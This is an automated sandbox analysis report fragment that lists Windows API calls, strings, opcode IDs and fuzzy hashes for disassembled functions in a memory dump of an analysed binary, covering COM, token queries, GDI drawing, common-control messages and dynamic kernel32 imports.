                                                                                                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2833360925-0
                                                                                                                                                        APIs
                                                                                                                                                        • CLSIDFromProgID.COMBASE ref: 00ACA874
                                                                                                                                                        • ProgIDFromCLSID.COMBASE(?,00000000), ref: 00ACA88F
                                                                                                                                                        • lstrcmpiW.KERNEL32(?,00000000), ref: 00ACA89D
                                                                                                                                                        • CoTaskMemFree.COMBASE(00000000), ref: 00ACA8AD
                                                                                                                                                        • CLSIDFromString.COMBASE(?,?), ref: 00ACA8B9
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3897988419-0
                                                                                                                                                        • Opcode ID: f341bdc28749cab9ef002dac96868d63a08b0ea5bcda22ad6819fe7ba8682fcb
                                                                                                                                                        • Instruction ID: 38e4ec63544c54f6787f5d6b435fb1b46fb5341b883ac6cd739fd30ecd99800d
                                                                                                                                                        • Opcode Fuzzy Hash: f341bdc28749cab9ef002dac96868d63a08b0ea5bcda22ad6819fe7ba8682fcb
                                                                                                                                                        • Instruction Fuzzy Hash: 7A014B76600218EFDB115F68EC84BAABBBDEF54799F158428B901D3210DB70DD419BA1
                                                                                                                                                        APIs
                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00ACB7A5
                                                                                                                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00ACB7AF
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00ACB7BE
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00ACB7C5
                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00ACB7DB
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 47921759-0
                                                                                                                                                        • Opcode ID: f6a103d3901d3b9a532067af6eef516b95d5f988a61c0fba11dd17e08027f7f3
                                                                                                                                                        • Instruction ID: 734bda5f732ae06615e42d70abfc479fe2830dfa585102a558899dce4417595b
                                                                                                                                                        • Opcode Fuzzy Hash: f6a103d3901d3b9a532067af6eef516b95d5f988a61c0fba11dd17e08027f7f3
                                                                                                                                                        • Instruction Fuzzy Hash: E4F0AF752412547FEB100FA4AC89FA73BACFF8A755F408019F950C7150CB619C018A70
                                                                                                                                                        APIs
                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00ACB806
                                                                                                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00ACB810
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00ACB81F
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00ACB826
                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00ACB83C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 47921759-0
                                                                                                                                                        • Opcode ID: 2b4e09408ae543c50cffae426f4961270eaeb9eec166b8d2926362422ed765cd
                                                                                                                                                        • Instruction ID: d826f8f89077748ac8adf52facfb8f32e59748bbb68543b0180f48d855da62a2
                                                                                                                                                        • Opcode Fuzzy Hash: 2b4e09408ae543c50cffae426f4961270eaeb9eec166b8d2926362422ed765cd
                                                                                                                                                        • Instruction Fuzzy Hash: 8AF03775210214AFEB215FA5EC99FAB3B6CFF4A754F008029F941D7150CFA198518B70
                                                                                                                                                        APIs
                                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00ACFA8F
                                                                                                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00ACFAA6
                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 00ACFABE
                                                                                                                                                        • KillTimer.USER32(?,0000040A), ref: 00ACFADA
                                                                                                                                                        • EndDialog.USER32(?,00000001), ref: 00ACFAF4
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3741023627-0
                                                                                                                                                        • Opcode ID: 6ad677ee1adb00251aafd2a3aed0adbd332b245be3a7f2c3d4e999e17212aeb0
                                                                                                                                                        • Instruction ID: d97e0c5f2295b8ef5c84db6954dfc6a0cd1bb9f56bd20ce18c17ab2acc050ae0
                                                                                                                                                        • Opcode Fuzzy Hash: 6ad677ee1adb00251aafd2a3aed0adbd332b245be3a7f2c3d4e999e17212aeb0
                                                                                                                                                        • Instruction Fuzzy Hash: 29018130500704AFEB259B14DD4EFD6B7BABB10B49F45416DB587A60E0DBF4A9448A50
                                                                                                                                                        APIs
                                                                                                                                                        • EndPath.GDI32(?), ref: 00AAB526
                                                                                                                                                        • StrokeAndFillPath.GDI32(?,?,00B0F583,00000000,?), ref: 00AAB542
                                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00AAB555
                                                                                                                                                        • DeleteObject.GDI32 ref: 00AAB568
                                                                                                                                                        • StrokePath.GDI32(?), ref: 00AAB583
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2625713937-0
                                                                                                                                                        • Opcode ID: c9cd417f6e348682d53104e76f81278b4f75067ee766a860833138447ffbe2b3
                                                                                                                                                        • Instruction ID: e9b8deebff220724ed2c364bcbaba663ec5eb60f00ab9ae75d814617a1ecaf22
                                                                                                                                                        • Opcode Fuzzy Hash: c9cd417f6e348682d53104e76f81278b4f75067ee766a860833138447ffbe2b3
                                                                                                                                                        • Instruction Fuzzy Hash: 34F0EC30450705EBDB255F69ED0C7A43FE5B702327F548654E4AA8B1F1CB3489A5DF20
                                                                                                                                                        APIs
                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00ADFAB2
                                                                                                                                                        • CoCreateInstance.COMBASE(00B1DA7C,00000000,00000001,00B1D8EC,?), ref: 00ADFACA
                                                                                                                                                          • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                                                                                                                                                        • CoUninitialize.COMBASE ref: 00ADFD2D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                                                        • String ID: .lnk
                                                                                                                                                        • API String ID: 2683427295-24824748
                                                                                                                                                        • Opcode ID: 40647e7cde5ee675a95887f83b14a6b5cfe4afce3f240d60892307e070d31ff6
                                                                                                                                                        • Instruction ID: 9c15fad10a67814eddd2b086eb9eca570320ec69fa6d78ba587cd4897ba751f4
                                                                                                                                                        • Opcode Fuzzy Hash: 40647e7cde5ee675a95887f83b14a6b5cfe4afce3f240d60892307e070d31ff6
                                                                                                                                                        • Instruction Fuzzy Hash: 5CA15D71604305AFC700EF64C991EABB7EDEF99704F40491DF1569B1A1EB70EA09CBA2
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: #$+
                                                                                                                                                        • API String ID: 0-2552117581
                                                                                                                                                        • Opcode ID: e49a1d3282d5e4530bbcb08bba0ae45a450bb26ba6920db865c818a92995db83
                                                                                                                                                        • Instruction ID: d1812cc20e156dc930bbb69c2f6725dc5bfb31f8f492c87c4791b874f34213d6
                                                                                                                                                        • Opcode Fuzzy Hash: e49a1d3282d5e4530bbcb08bba0ae45a450bb26ba6920db865c818a92995db83
                                                                                                                                                        • Instruction Fuzzy Hash: 54511EB4604246CFDF11EF68C495AFA7BE4EF26310F144099FA929B2E0D7309D46CB20
                                                                                                                                                        APIs
                                                                                                                                                        • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00B2DC40,?,0000000F,0000000C,00000016,00B2DC40,?), ref: 00AD507B
                                                                                                                                                          • Part of subcall function 00A984A6: __swprintf.LIBCMT ref: 00A984E5
                                                                                                                                                          • Part of subcall function 00A984A6: __itow.LIBCMT ref: 00A98519
                                                                                                                                                          • Part of subcall function 00A9B8A7: _memmove.LIBCMT ref: 00A9B8FB
                                                                                                                                                        • CharUpperBuffW.USER32(?,?,00000000,?), ref: 00AD50FB
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: BuffCharUpper$__itow__swprintf_memmove
                                                                                                                                                        • String ID: REMOVE$THIS
                                                                                                                                                        • API String ID: 2528338962-776492005
                                                                                                                                                        • Opcode ID: 6d0ff3b641b0224815ca9c8284d34579c9e0ee2fc4859afe0b4ebf441baea532
                                                                                                                                                        • Instruction ID: 62efb08cc4a7a08a025426840d86854a0a6e5067581d0861e2bfb575e0358bf5
                                                                                                                                                        • Opcode Fuzzy Hash: 6d0ff3b641b0224815ca9c8284d34579c9e0ee2fc4859afe0b4ebf441baea532
                                                                                                                                                        • Instruction Fuzzy Hash: 08417F35A00609AFCF05EF64C981AAEB7F5BF49304F04816AF856AB392DB349D41CB50
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AD4D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00ACC9FE,?,?,00000034,00000800,?,00000034), ref: 00AD4D6B
                                                                                                                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00ACCFC9
                                                                                                                                                          • Part of subcall function 00AD4D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00ACCA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 00AD4D36
                                                                                                                                                          • Part of subcall function 00AD4C65: GetWindowThreadProcessId.USER32(?,?), ref: 00AD4C90
                                                                                                                                                          • Part of subcall function 00AD4C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00ACC9C2,00000034,?,?,00001004,00000000,00000000), ref: 00AD4CA0
                                                                                                                                                          • Part of subcall function 00AD4C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00ACC9C2,00000034,?,?,00001004,00000000,00000000), ref: 00AD4CB6
                                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00ACD036
                                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00ACD083
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                        • String ID: @
                                                                                                                                                        • API String ID: 4150878124-2766056989
                                                                                                                                                        • Opcode ID: c3d6cafbb4fa0786b1923ed02ce0998ea963adc1227f75b5d6f462896e2558db
                                                                                                                                                        • Instruction ID: 18b8890b91baeb8cc75bd9f3c069f00559e07d110256702948fa64ebb082f309
                                                                                                                                                        • Opcode Fuzzy Hash: c3d6cafbb4fa0786b1923ed02ce0998ea963adc1227f75b5d6f462896e2558db
                                                                                                                                                        • Instruction Fuzzy Hash: C9413E76900218BFDB10DFA4CD85FDEBBB8EF49700F108099EA56B7191DA706E45CB61
                                                                                                                                                        APIs
                                                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00B2DBF0,00000000,?,?,?,?), ref: 00AFA4E6
                                                                                                                                                        • GetWindowLongW.USER32 ref: 00AFA503
                                                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00AFA513
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$Long
                                                                                                                                                        • String ID: SysTreeView32
                                                                                                                                                        • API String ID: 847901565-1698111956
                                                                                                                                                        • Opcode ID: 4f4c4b33a262bcfa7a36344cda981052f7a606338ad81f954eeb301867bd33ba
                                                                                                                                                        • Instruction ID: 5d20b04675314faccf8c610c182e9c8c4623ccead32a42994517bfec790a87ed
                                                                                                                                                        • Opcode Fuzzy Hash: 4f4c4b33a262bcfa7a36344cda981052f7a606338ad81f954eeb301867bd33ba
                                                                                                                                                        • Instruction Fuzzy Hash: D531B271240609AFDB218F78CC45BE67BA9EF59334F248715F979932E0D770E8509B50
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00AFA74F
                                                                                                                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00AFA75D
                                                                                                                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00AFA764
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$DestroyWindow
                                                                                                                                                        • String ID: msctls_updown32
                                                                                                                                                        • API String ID: 4014797782-2298589950
                                                                                                                                                        • Opcode ID: e20046586cc244c5ef61237551334bcfeca4d02835cab476184d3bc65a0c845b
                                                                                                                                                        • Instruction ID: 33793160c703fbcd96ad1ac5cc824f9412307aafe6515a26084339c58f0239eb
                                                                                                                                                        • Opcode Fuzzy Hash: e20046586cc244c5ef61237551334bcfeca4d02835cab476184d3bc65a0c845b
                                                                                                                                                        • Instruction Fuzzy Hash: 182151B5A00209AFDB10EF68CCC1EB737ADEB5A394B040459FA05D7351CB70EC11DA61
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00AF983D
                                                                                                                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00AF984D
                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00AF9872
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$MoveWindow
                                                                                                                                                        • String ID: Listbox
                                                                                                                                                        • API String ID: 3315199576-2633736733
                                                                                                                                                        • Opcode ID: 8abb06159dfa0a7f2a96e5ce5281da3e18a9b5d6c2d102e7991a2a1525d1c204
                                                                                                                                                        • Instruction ID: 22cb7ef7a75684f7d4ca86d3036741c910300010f078820616027ae9ba73bf49
                                                                                                                                                        • Opcode Fuzzy Hash: 8abb06159dfa0a7f2a96e5ce5281da3e18a9b5d6c2d102e7991a2a1525d1c204
                                                                                                                                                        • Instruction Fuzzy Hash: 2E21A73161021CBFEF119F94CC85FBB3BAAEF8A794F018124FA055B190CA719C5187E0
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00AFA27B
                                                                                                                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00AFA290
                                                                                                                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00AFA29D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                        • String ID: msctls_trackbar32
                                                                                                                                                        • API String ID: 3850602802-1010561917
                                                                                                                                                        • Opcode ID: 6ef2dc3bf1e6ba8d15d3d5f5e16f764dacaf0be945f3b4bf10532457bfac30fa
                                                                                                                                                        • Instruction ID: 30bb8ad92d9f038a0e6b613a05622f9b6baf4b1eb5025f6db86e39cae6a600b4
                                                                                                                                                        • Opcode Fuzzy Hash: 6ef2dc3bf1e6ba8d15d3d5f5e16f764dacaf0be945f3b4bf10532457bfac30fa
                                                                                                                                                        • Instruction Fuzzy Hash: 2611E771240308BAEB205FA5CC46FE73BA8EF99B54F114118FB45970A0D6729851DB60
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,?,00AB2F11,00000000), ref: 00AB2F79
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00AB2F80
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                        • String ID: RoInitialize$combase.dll
                                                                                                                                                        • API String ID: 2574300362-340411864
                                                                                                                                                        • Opcode ID: 877b2c39e35faf0200fad7a64b7f5755e6c1f75d9b0c89cde034fbff347f9b86
                                                                                                                                                        • Instruction ID: 059dc18c693675b769ba6ff337a84623e1effef0b9e3187e8ef2cfb695228cf1
                                                                                                                                                        • Opcode Fuzzy Hash: 877b2c39e35faf0200fad7a64b7f5755e6c1f75d9b0c89cde034fbff347f9b86
                                                                                                                                                        • Instruction Fuzzy Hash: E1E01A746E4702AAEB106F70EC49BD53AA8BB01746F5040A4B202F71B0CFB54050DF05
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00AB2F4E), ref: 00AB304E
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00AB3055
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                        • String ID: RoUninitialize$combase.dll
                                                                                                                                                        • API String ID: 2574300362-2819208100
                                                                                                                                                        • Opcode ID: c6d6d1f95668f8daa072e552bfd467ceb07458cea07000f190d2f562e25dd2a4
                                                                                                                                                        • Instruction ID: 0cd3248596322eacec370be04b585ced21d1f0d770cb4a26f6b6310533e7fc42
                                                                                                                                                        • Opcode Fuzzy Hash: c6d6d1f95668f8daa072e552bfd467ceb07458cea07000f190d2f562e25dd2a4
                                                                                                                                                        • Instruction Fuzzy Hash: 6CE0B6746A8700ABEB20BF71ED0DB953AA8BB00703F500098F609F31B1DFB845408B16
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LocalTime__swprintf
                                                                                                                                                        • String ID: %.3d$WIN_XPe
                                                                                                                                                        • API String ID: 2070861257-2409531811
                                                                                                                                                        • Opcode ID: dc9c8402c99038c2bc742d0f966992897fef63e656a7c74a3681ceea044deca3
                                                                                                                                                        • Instruction ID: 1d831871766cc5807bab00bf3217e72491ee7599ebbde197908d9b1d43305439
                                                                                                                                                        • Opcode Fuzzy Hash: dc9c8402c99038c2bc742d0f966992897fef63e656a7c74a3681ceea044deca3
                                                                                                                                                        • Instruction Fuzzy Hash: B4E01271D0801CFACB14C6908D86EFA77FCAB08300F5084D3B91692095DB359B54AB21
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00AF20EC,?,00AEF751), ref: 00AF2104
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00AF2116
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                        • String ID: GetProcessId$kernel32.dll
                                                                                                                                                        • API String ID: 2574300362-399901964
                                                                                                                                                        • Opcode ID: 02ed7ea642128873aeba5e1b500ddf41cad84533e170bcbb78589a1c87255765
                                                                                                                                                        • Instruction ID: d5aba54f2a2ffcf78b1d86b880ffd7c03e027ce06d8d16e83497ff280c422e08
                                                                                                                                                        • Opcode Fuzzy Hash: 02ed7ea642128873aeba5e1b500ddf41cad84533e170bcbb78589a1c87255765
                                                                                                                                                        • Instruction Fuzzy Hash: 6DD0A7744403129FD7205FA5E80D75237E8EF04300B008469F749E2168DB70C480CB14
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00AAE69C,?,00AAE43F), ref: 00AAE6B4
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00AAE6C6
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                        • API String ID: 2574300362-192647395
                                                                                                                                                        • Opcode ID: e302f65b495798f5b3ae1b6ac37af5aeead3143ee139ffc8b98d252c2e10877e
                                                                                                                                                        • Instruction ID: 4b26311fe15767715f5a078f2f62067d53928b817966ac081df591369fbb5726
                                                                                                                                                        • Opcode Fuzzy Hash: e302f65b495798f5b3ae1b6ac37af5aeead3143ee139ffc8b98d252c2e10877e
                                                                                                                                                        • Instruction Fuzzy Hash: 48D0A7744803129FD7219F31E80874237E4AFA8305B409859F485E31B4DB70C4809610
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00AAE6D9,0000000C,00AAE55B,00B2DC28,?,?), ref: 00AAE6F1
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00AAE703
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                        • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                        • API String ID: 2574300362-3024904723
                                                                                                                                                        • Opcode ID: bd1e4a9747104594c8f6f7b5d2ca3f46f4a71e01decd7e82903dc2b65994afc9
                                                                                                                                                        • Instruction ID: 8a88891aedf7b20ed79b628c40a6a8c7cf8aad2e0666ee4b8691d2a7e0ab8105
                                                                                                                                                        • Opcode Fuzzy Hash: bd1e4a9747104594c8f6f7b5d2ca3f46f4a71e01decd7e82903dc2b65994afc9
                                                                                                                                                        • Instruction Fuzzy Hash: 21D0A974480322AFDB24AF22E84C7833BE8BF05300B40846AF495E32A0DBB0C8809A10
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00AEEBAF,?,00AEEAAC), ref: 00AEEBC7
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00AEEBD9
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                                                        • API String ID: 2574300362-1816364905
